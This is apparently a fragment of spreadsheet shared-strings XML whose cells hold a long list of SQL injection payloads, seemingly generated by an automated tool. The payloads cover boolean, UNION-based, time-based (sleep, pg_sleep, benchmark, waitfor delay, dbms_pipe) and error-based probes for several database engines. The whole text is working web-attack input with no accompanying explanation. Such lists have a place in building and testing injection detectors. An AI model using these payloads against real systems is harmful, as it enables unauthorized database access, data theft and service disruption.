    <t>1' )  as ihsc where 3978 = 3978</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" where 5328 = 5328 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>-9484' or  ( 7129 = 2349 ) *2349 and 'fcsa' like 'fcsa</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and make_set ( 1559 = 4863,4863 ) </t>
  </si>
  <si>
    <t>1 )  as guru where 7615 = 7615 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  as dlfq where 8410 = 8410</t>
  </si>
  <si>
    <t>1'+ ( select 'uzaw' where 9900 = 9900 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  +'</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  rlike sleep ( 5 )  and  ( 'qsub' like 'qsub</t>
  </si>
  <si>
    <t>1 )  as lfra where 2669 = 2669 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>-3540 where 7302 = 7302 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr</t>
  </si>
  <si>
    <t>-4230"  )  )   )  union all select 6962,6962,6962,6962,6962,6962#</t>
  </si>
  <si>
    <t>1 )  as tngy where 8956 = 8956 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( 'kgdt' like 'kgdt</t>
  </si>
  <si>
    <t>1" where 3740 = 3740 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1" )  where 6138 = 6138 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   as luon where 4676 = 4676 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  'zeyr' = 'zeyr</t>
  </si>
  <si>
    <t xml:space="preserve">elt ( 8192 = 8192,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-1510'  )  )   )  union all select 8755,8755,8755,8755,8755,8755,8755,8755,8755,8755--</t>
  </si>
  <si>
    <t>1" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "tgdu" = "tgdu</t>
  </si>
  <si>
    <t>1'  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'hbwk' like 'hbwk</t>
  </si>
  <si>
    <t>-9923%'  )  )   )  union all select 8985,8985,8985,8985,8985,8985,8985#</t>
  </si>
  <si>
    <t>-9389' )  or 8859 = 3989--</t>
  </si>
  <si>
    <t>1'+ ( select naiw where 4924 = 4924</t>
  </si>
  <si>
    <t>-9120'  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  "bxct" like "bxct</t>
  </si>
  <si>
    <t>1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and 'pphf' = 'pphf</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-3243 or 2266 = 3583#</t>
  </si>
  <si>
    <t>1" )  as jiyl where 4893 = 4893 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( 7098 = 7098 and sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1%'  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>-8836%' )  or 4856 = 3891</t>
  </si>
  <si>
    <t>-6433%'  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>-3604' )  as fyev where 7259 = 7259 union all select 7259,7259,7259,7259--</t>
  </si>
  <si>
    <t>1" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq  )  )  +'</t>
  </si>
  <si>
    <t>-1598"  )  )   or elt ( 5329 = 9628,9628 )  and   (  (  "hyxq" like "hyxq</t>
  </si>
  <si>
    <t>1'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'hllf' = 'hllf</t>
  </si>
  <si>
    <t>1' where 4134 = 4134 and 1102 = 6300--</t>
  </si>
  <si>
    <t>-4901 )  or 3407 = 6442#</t>
  </si>
  <si>
    <t>1' )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( 'tmbs' = 'tmbs</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 3717 = 3717 )  then 1 else 3717* ( select 3717 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and 'mepp' = 'mepp</t>
  </si>
  <si>
    <t xml:space="preserve">1' and elt ( 2266 = 7467,7467 ) </t>
  </si>
  <si>
    <t>-4955%' union all select 5928,5928--</t>
  </si>
  <si>
    <t>1  )  )   union all select null#</t>
  </si>
  <si>
    <t>1' in boolean mode )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  #</t>
  </si>
  <si>
    <t>-6307' where 8916 = 8916 union all select 8916,8916,8916,8916,8916,8916,8916--</t>
  </si>
  <si>
    <t>1" )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( "btht" = "btht</t>
  </si>
  <si>
    <t>-5202 union all select 5332,5332,5332,5332,5332,5332,5332#</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "llgb" like "llgb</t>
  </si>
  <si>
    <t>1%'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and "pwwb" like "pwwb</t>
  </si>
  <si>
    <t>1'|| ( select 'ywfo' from dual where 4168 = 4168 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 6002 = 9048 )  then 6002 else 6002* ( select 6002 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-6184"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char (</t>
  </si>
  <si>
    <t>-2287'  )  )   union all select 1200,1200,1200,1200,1200#</t>
  </si>
  <si>
    <t>1'  )  )   as nxhp where 2649 = 2649 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'dvpw' = 'dvpw</t>
  </si>
  <si>
    <t>-2314"  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  "uatq" like "uatq</t>
  </si>
  <si>
    <t>1' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'bzgs' like 'bzgs</t>
  </si>
  <si>
    <t>1' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( 'gzpx' = 'gzpx</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 4209 = 5879 )  then 1 else 4209* ( select 4209 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1  )  )   as myyh where 5116 = 5116 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" and elt ( 1210 = 1210,sleep ( 5  )  )   and "zhxm" = "zhxm</t>
  </si>
  <si>
    <t>1 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-7802'  )  )   )  or elt ( 8778 = 9974,9974 )  and   (  (   ( 'glsq' like 'glsq</t>
  </si>
  <si>
    <t>1 )  as zmjm where 9125 = 9125 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'peyy' = 'peyy</t>
  </si>
  <si>
    <t>1 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 5152 = 7853 )  then 5152 else 5152* ( select 5152 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1"  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  "alkz" = "alkz</t>
  </si>
  <si>
    <t>1%'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-9429' )  order by 1--</t>
  </si>
  <si>
    <t>1 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1' )  where 4407 = 4407 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   as zbfj where 2285 = 2285</t>
  </si>
  <si>
    <t>1' )  as cdrm where 4595 = 4595 order by 1#</t>
  </si>
  <si>
    <t>1'+ ( select 'diet' where 7004 = 7004 rlike sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>1%' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and '%' = '</t>
  </si>
  <si>
    <t>-3937  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>1'  )  )   as qzyp where 5081 = 5081 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  where 6842 = 6842</t>
  </si>
  <si>
    <t>1" where 6179 = 6179</t>
  </si>
  <si>
    <t>1%'  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 and elt ( 4249 = 4249,7259 ) </t>
  </si>
  <si>
    <t>-8447 where 2850 = 2850 or 7147 = 3262</t>
  </si>
  <si>
    <t>1' where 8635 = 8635 order by 1--</t>
  </si>
  <si>
    <t>1' where 8451 = 8451 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-2630'  )  )   as xavw where 6291 = 6291 union all select 6291,6291,6291,6291,6291,6291,6291,6291,6291#</t>
  </si>
  <si>
    <t>-1055' union all select 7758,7758,7758,7758,7758,7758--</t>
  </si>
  <si>
    <t>1" )  where 8462 = 8462 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 4291 = 6937 )  then 4291 else 4291* ( select 4291 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'xemx' from dual where 4683 = 4683 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 where 2239 = 2239 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( "fcpm" = "fcpm</t>
  </si>
  <si>
    <t>1'|| ( select 'zqwd' where 1647 = 1647 rlike sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 2997 = 2997</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1' or elt ( 6272 = 6272,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>-8369 )  where 7234 = 7234 order by 1--</t>
  </si>
  <si>
    <t>-6112" )  union all select 8203,8203,8203,8203,8203,8203,8203--</t>
  </si>
  <si>
    <t>1 )  as selm where 5759 = 5759</t>
  </si>
  <si>
    <t>1  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 8382 = 8382</t>
  </si>
  <si>
    <t>1"  )  )   as swix where 2459 = 2459 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1 where 8273 = 8273 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-9861' union all select 5710,5710,5710,5710,5710--</t>
  </si>
  <si>
    <t>select  ( case when  ( 3140 = 4625 )  then 1 else 3140* ( select 3140 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( 'eihl' = 'eihl</t>
  </si>
  <si>
    <t>-4313%' )  or 6872 = 6872 and  ( '%' = '</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 2385 ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select * from generate_series ( 3551,3551,case when  ( 3551 = 6451 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-6194" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1" )  as uuth where 8555 = 8555 union all select null,null#</t>
  </si>
  <si>
    <t>1' where 8159 = 8159 union all select null#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 union all select null--</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( "snwx" like "snwx</t>
  </si>
  <si>
    <t>select  ( case when  ( 4996 = 1734 )  then 1 else 4996* ( select 4996 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-5764 or 3038 = 3038</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and 'ctac' like 'ctac</t>
  </si>
  <si>
    <t>-5640"  )  )   or 9792 = 2728--</t>
  </si>
  <si>
    <t>-9634'  )  )   )  union all select 4141,4141#</t>
  </si>
  <si>
    <t>1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) # dwxl</t>
  </si>
  <si>
    <t>-3102 )  union all select 6707,6707,6707,6707--</t>
  </si>
  <si>
    <t>1'+ ( select plhk where 6540 = 6540</t>
  </si>
  <si>
    <t>1" )  as ypfa where 6128 = 6128</t>
  </si>
  <si>
    <t>1' in boolean mode )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) #</t>
  </si>
  <si>
    <t>1 and elt ( 4249 = 4249,7259 ) -- meef</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( 8354 = 8354</t>
  </si>
  <si>
    <t>-5322" union all select 6494,6494,6494,6494,6494,6494--</t>
  </si>
  <si>
    <t>-5391 or make_set ( 9354 = 9354,7185 ) # ptyy</t>
  </si>
  <si>
    <t>1%' and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-9583'  )  )   union all select 6392,6392,6392,6392,6392,6392,6392,6392,6392,6392#</t>
  </si>
  <si>
    <t>1 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  -- kegk</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 6986 = 6986 )  then 6986 else 6986* ( select 6986 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1 where 3175 = 3175 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  3003 = 3003</t>
  </si>
  <si>
    <t>-2862'  )  )   )  union all select 6649,6649--</t>
  </si>
  <si>
    <t>-3998'  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>-6890"  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "ftho" like "ftho</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">-8069'  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 </t>
  </si>
  <si>
    <t>-5344" union all select 9482,9482,9482,9482,9482,9482,9482,9482,9482--</t>
  </si>
  <si>
    <t>1" )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( "jebr" like "jebr</t>
  </si>
  <si>
    <t>-9837" where 7201 = 7201 union all select 7201,7201,7201--</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'+ ( select ummn where 8883 = 8883 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1 rlike sleep ( 5 ) # urxh</t>
  </si>
  <si>
    <t>1' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and 'vwve' like 'vwve</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select biqo where 6046 = 6046</t>
  </si>
  <si>
    <t>1" and 2006 = 2006</t>
  </si>
  <si>
    <t>1 where 2914 = 2914 union all select null,null,null#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'nbsf' like 'nbsf</t>
  </si>
  <si>
    <t>-6475"  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1'  )  )   as cwss where 9720 = 9720</t>
  </si>
  <si>
    <t>1%"  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 5154 = 5154 )  then 1 else 5154* ( select 5154 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1' where 1652 = 1652 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' where 5035 = 5035 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'xyrk' from dual where 9844 = 9844 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-3821' )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>-8038'  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  'xfyq' = 'xfyq</t>
  </si>
  <si>
    <t>-7868" union all select 1805--</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t>1  )  )   as rbae where 2049 = 2049 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-9405' )  union all select 8283,8283,8283,8283--</t>
  </si>
  <si>
    <t>-1040 where 3058 = 3058 union all select 3058,3058,3058,3058,3058,3058,3058,3058,3058,3058--</t>
  </si>
  <si>
    <t>-2305' in boolean mode )  union all select 8147,8147,8147,8147,8147,8147,8147,8147,8147,8147--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1 where 1842 = 1842 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">-6244' )  as szpd where 8445 = 8445 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) </t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( "mofa" like "mofa</t>
  </si>
  <si>
    <t>1'  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'aumk' like 'aumk</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'hryb' = 'hryb</t>
  </si>
  <si>
    <t>select  ( case when  ( 8716 = 1338 )  then 1 else 8716* ( select 8716 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-5245"  )  )   )  union all select 8106,8106,8106#</t>
  </si>
  <si>
    <t>1  )  )   as emtf where 3561 = 3561 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and 'hofy' like 'hofy</t>
  </si>
  <si>
    <t>1'+ ( select 'qsqs' where 9227 = 9227 waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t xml:space="preserve">-3109" or elt ( 1032 = 1032,3623 ) </t>
  </si>
  <si>
    <t>1'+ ( select mcfb where 4050 = 4050 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  +'</t>
  </si>
  <si>
    <t>-7139" )  where 2723 = 2723 or 3900 = 5082--</t>
  </si>
  <si>
    <t>1 where 5311 = 5311 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and 'tuzl' = 'tuzl</t>
  </si>
  <si>
    <t>1"  )  )   as eagr where 3366 = 3366 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>1%' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'gfln' = 'gfln</t>
  </si>
  <si>
    <t>-4248"  )  )   union all select 9450,9450,9450--</t>
  </si>
  <si>
    <t>-8735'  )  )   union all select 3262,3262,3262--</t>
  </si>
  <si>
    <t>1'+ ( select 'wyxu' where 2555 = 2555 union all select null#</t>
  </si>
  <si>
    <t>1' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and 'iwmy' = 'iwmy</t>
  </si>
  <si>
    <t>-3361'|| ( select 'msfi' where 4806 = 4806 union all select 4806,4806,4806,4806,4806,4806,4806,4806,4806--</t>
  </si>
